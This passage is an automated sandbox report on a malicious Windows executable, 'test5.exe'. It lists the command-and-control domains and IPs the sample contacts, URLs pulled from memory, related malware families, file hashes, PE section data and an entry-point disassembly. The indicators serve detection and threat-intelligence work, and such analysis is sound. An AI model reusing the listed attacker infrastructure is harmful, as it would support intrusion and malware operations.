https://anonyflag.cfd/o	0%	Avira URL Cloud	safe
https://47.90.135.102/2Vcr.	0%	Avira URL Cloud	safe
http://www.google.com4	0%	Avira URL Cloud	safe
https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
anonyflag.cfd	104.21.34.5	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://47.90.135.102/2Vcr	true	Avira URL Cloud: safe	unknown
https://47.90.135.102/2Vcr	true	Avira URL Cloud: safe	unknown
http://7.90.135.102:443/2Vcr	true	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://47.90.135.102/2VcrZ	test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/~	test5.exe, 00000000.00000002.2903186062.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.90.135.102/	test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/cros	test5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/P	test5.exe, 00000000.00000003.2489739391.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/yflag.cfd/	test5.exe, 00000000.00000003.2700818871.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/yflag.cfd/p	test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/tography	test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2639261263.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2738354693.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2775374438.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/G	test5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/	test5.exe, 00000000.00000003.2719078147.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcno	test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/7h	test5.exe, 00000000.00000003.1796650750.000002150C807000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/yflag.cfd/Y	test5.exe, 00000000.00000003.2098276910.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/rovider	test5.exe, 00000000.00000003.1755611504.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983310053.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/iiloksh	test5.exe, 00000000.00000003.1871884712.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C807000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.90.135.102/2VcrB	test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/Y	test5.exe, 00000000.00000003.2060130852.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2079665751.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/de	test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/dep	test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2322882748.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/p	test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2229582416.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2211383479.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2378590026.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2891419412.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2433982166.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2526696022.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2154433482.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.google.com	test5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1871884712.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2192543471.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1908657330.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://anonyflag.cfd/der	test5.exe, 00000000.00000003.2659827113.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/o	test5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2060189313.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2040694877.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/Kh	test5.exe, 00000000.00000003.1833670081.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C807000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/vide	test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/Kb	test5.exe, 00000000.00000003.1926941171.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1945818103.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://anonyflag.cfd/yflag.cfd/P	test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.google.com4	test5.exe, 00000000.00000003.1736880484.000002150C81A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.90.135.102/2Vcr.	test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micros	test5.exe, 00000000.00000003.1713803951.0000021553CA4000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1736911456.0000021553CA4000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.90.135.102	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
104.21.34.5	anonyflag.cfd	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581646
Start date and time:	2024-12-28 11:35:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	test5.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@1/0@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 21 Number of non-executed functions: 120
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:36:01	API Interceptor	63x Sleep call for process: test5.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	192.229.221.95
	http://volmar.sinformations.cfd	Get hash	malicious	Unknown	Browse	192.229.221.95
	OTRykEzo6o.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	ctfmon.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	wce.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	atw3.dll	Get hash	malicious	Gozi, Ursnif	Browse	192.229.221.95
	setup.msi	Get hash	malicious	Unknown	Browse	192.229.221.95
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	libcurl.dll	Get hash	malicious	Matanbuchus	Browse	47.254.174.185
	EpCAySF1G6.exe	Get hash	malicious	Unknown	Browse	8.218.163.62
	EpCAySF1G6.exe	Get hash	malicious	Unknown	Browse	8.218.163.62
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	47.245.158.74
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	47.57.184.195
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse	8.212.102.187
	splarm7.elf	Get hash	malicious	Unknown	Browse	47.253.191.95
	nabsh4.elf	Get hash	malicious	Unknown	Browse	47.240.78.242
	splppc.elf	Get hash	malicious	Unknown	Browse	47.52.40.232
	arm.elf	Get hash	malicious	Unknown	Browse	8.208.49.9
CLOUDFLARENETUS	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GHXsFkoroU.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	5Z19n7XRT1.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	47.90.135.102
	EQ5Vcf19u8.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	EQ5Vcf19u8.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	vwZcJ81cpN.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	vwZcJ81cpN.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	gjEtERlBSv.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	gjEtERlBSv.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
	WindowsUpdate.exe	Get hash	malicious	Unknown	Browse	47.90.135.102
	Hbq580QZAR.exe	Get hash	malicious	Socks5Systemz	Browse	47.90.135.102
37f463bf4616ecd445d4a1937da06e19	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	104.21.34.5
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	104.21.34.5
	solara-executor.exe	Get hash	malicious	Unknown	Browse	104.21.34.5
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.34.5
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.34.5
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.34.5
	search.hta	Get hash	malicious	Unknown	Browse	104.21.34.5
	TrdIE26br9.msi	Get hash	malicious	Unknown	Browse	104.21.34.5
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	104.21.34.5
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.34.5

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.953591135499263
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	test5.exe
File size:	4'492'800 bytes
MD5:	ac76c4a995accb8a1d272cb76c4374ee
SHA1:	634fe41bf551c79cd1a3d9eb019da51d8c3803b5
SHA256:	30f23855d09b242339d3bdd20fc72ac30569be14701fe6a3080b284a15eeacf0
SHA512:	f86f947e814686e0e2587903cc193f4b199f2408d4981f54382e775b3297f03b4cc4f08a7d22af91b36569e147e4e114ef1d342280cf76149c197c6879acc7e9
SSDEEP:	49152:1KJbZO1TH+vgz2Vit6e/ZhjX5ENwXa6DsTQUVqVQRrOw8nP1tvAvK:1KI7CLeR3E6K6DsZVgQ4n/SK
TLSH:	6A268D07EC9104F9C0A9A33189A692A37B71BC184B3163DB3F60B7782E767D45EB9750
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........A.J....."......"...V................@...............................I...........`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x471fe0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	d42595b695fc008ef2c56aabd8efd68e

Entrypoint Preview

Instruction
jmp 00007FF460D8AF00h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
dec eax
mov ebp, esp
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [002ADE02h]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007FF460D8E7E5h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007FF460D9823Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x465000	0x53e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x324000	0x7908	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x466000	0x6a70	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a41c0	0x178	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13214b	0x132200	6b217a12f77539aedb9ee6336f286851	False	0.4484068752552062	data	6.278304117862662	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x134000	0x16f0e0	0x16f200	b4f4bf3b3d68bdc5c28b93527c02a8ee	False	0.43662219101123595	data	5.750976957762315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2a4000	0x7fac0	0x35600	fd1716a15170d77a38e4270b517f30d5	False	0.36168947599531615	data	4.683653575448602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x324000	0x7908	0x7a00	7a69f4537fd200d81e49160a0405178c	False	0.40288806352459017	data	5.319641636818224	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x32c000	0xb4	0x200	4b5b63b6874df65239dc99aa4c50ce97	False	0.22265625	shared library	1.783206012798912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0x32d000	0x14c	0x200	aaf28638a5fca2ae9b61c2d0ecb5c6e7	False	0.697265625	data	5.610479515469117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x32e000	0x3dc91	0x3de00	2256c82066f38af88126b080cde2eb02	False	0.9990767045454545	data	7.995650064693668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/32	0x36c000	0xc39b	0xc400	48cce4a3ca34e8195d72c07cbc60dc52	False	0.9969308035714286	data	7.933824164939166	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/46	0x379000	0x68	0x200	1a24a35de8624cf9a09a0c78bac4c352	False	0.212890625	data	1.7020804543167358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/65	0x37a000	0x91141	0x91200	7da86535a019c360b709d7dce2400ba7	False	1.0000639265719207	data	7.99808013808122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
